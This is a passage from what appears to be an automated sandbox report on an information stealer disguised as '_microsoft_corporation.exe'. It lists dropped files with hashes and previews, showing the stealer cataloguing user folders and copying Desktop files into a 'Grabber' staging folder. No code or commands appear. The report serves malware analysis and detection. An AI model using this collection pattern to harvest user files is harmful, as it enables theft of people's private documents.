Preview:	Downloads\...BPMLNOBVSB.png...desktop.ini...DVWHKMNFNN.docx...FENIVHOIKN.mp3...KZWFNRXYKI.mp3...KZWFNRXYKI.pdf...LTKMYBSEYZ.docx...LTKMYBSEYZ.xlsx...NWTVCDUMOB.pdf...WUTJSCBCFX.jpg...WUTJSCBCFX.xlsx...YPSIACHYXW.png...ZBEDCJPBEY.jpg..

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Directories\OneDrive.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.023465189601646
Encrypted:	false
SSDEEP:	3:1hiR8LKB:14R8LKB
MD5:	966247EB3EE749E21597D73C4176BD52
SHA1:	1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
SHA-256:	8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
SHA-512:	BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
Malicious:	false
Preview:	OneDrive\...desktop.ini..

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Directories\Pictures.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	88
Entropy (8bit):	4.450045114302317
Encrypted:	false
SSDEEP:	3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
MD5:	D430E8A326E3D75F5E49C40C111646E7
SHA1:	D8F2494185D04AB9954CD78268E65410768F6226
SHA-256:	22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
SHA-512:	1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
Malicious:	false
Preview:	Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Directories\Startup.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.053508854797679
Encrypted:	false
SSDEEP:	3:jgBLKB:j4LKB
MD5:	68C93DA4981D591704CEA7B71CEBFB97
SHA1:	FD0F8D97463CD33892CC828B4AD04E03FC014FA6
SHA-256:	889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
SHA-512:	63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
Malicious:	false
Preview:	Startup\...desktop.ini..

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Directories\Temp.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4412
Entropy (8bit):	5.287331436185008
Encrypted:	false
SSDEEP:	96:4jzcRPTmt6qESftmJNjbQVuLpIwrbIGVWCMk2j/JM0gu+Gwq:BtbS1mJtcU1TUKqqq
MD5:	61B1BC1B3C6D4DF9921AA38120078C92
SHA1:	B0C924E8052AEB9C89E1FF2874FFFF22AA19518D
SHA-256:	536EEC87B1DD76E21D90E438F8621F8746D56B1C38F34162844101FDF896FA16
SHA-512:	D5D3F5D12FC2F96CC9E4C30AEE91FC8EE2E190E82B23380B36CD8D771208AD03D1B29881CB09B303CA06DFEB1230A1F17C0A31F7E2D726558E9BD93D6A458507
Malicious:	false
Preview:	Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-00-50-743.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-01-22-078.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696334775820156800_6EB929AF-656E-4F43-9731-EA7753E1F1BD.log.....App1696334923056622400_BD966DD2-7850-423A-B1D8-7882CE1A6D15.log.....App1696417072488237400_C12D9B44-3468-47BC-9418-BF0A674A2B2F.log.....App1696417101742322600_290EFEE9-C25A-4857-9F32-D7E6D51B7C09.log.....App1696417118050662300_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App1696417118051710600_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App_1696413198165042300_AA3FCB9C-CF1A-4407-8A94-A7D6C220021F.log...Low\...mozilla-temp-files\...Symbols\....ntkrnlmp.pdb\.....68A17FAF3012B7846079AEECDBE0A5831\......download.error......ntkrnlmp.pdb....winload

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Directories\Videos.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.7950885863977324
Encrypted:	false
SSDEEP:	3:k+JrLKB:k+JrLKB
MD5:	1FDDBF1169B6C75898B86E7E24BC7C1F
SHA1:	D2091060CB5191FF70EB99C0088C182E80C20F8C
SHA-256:	A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
SHA-512:	20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
Malicious:	false
Preview:	Videos\...desktop.ini..

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\BPMLNOBVSB.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702896917219035
Encrypted:	false
SSDEEP:	24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
MD5:	C68274AA8B7F713157BEBE2FCC2EA5D3
SHA1:	52A5A2D615A813B518DDAAC2A02095F1059DAAD5
SHA-256:	362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
SHA-512:	BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
Malicious:	false
Preview:	BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DVWHKMNFNN.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DVWHKMNFNN\DVWHKMNFNN.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	true
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DVWHKMNFNN\LTKMYBSEYZ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	true
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DVWHKMNFNN\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DVWHKMNFNN\WUTJSCBCFX.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DVWHKMNFNN\YPSIACHYXW.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KZWFNRXYKI.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
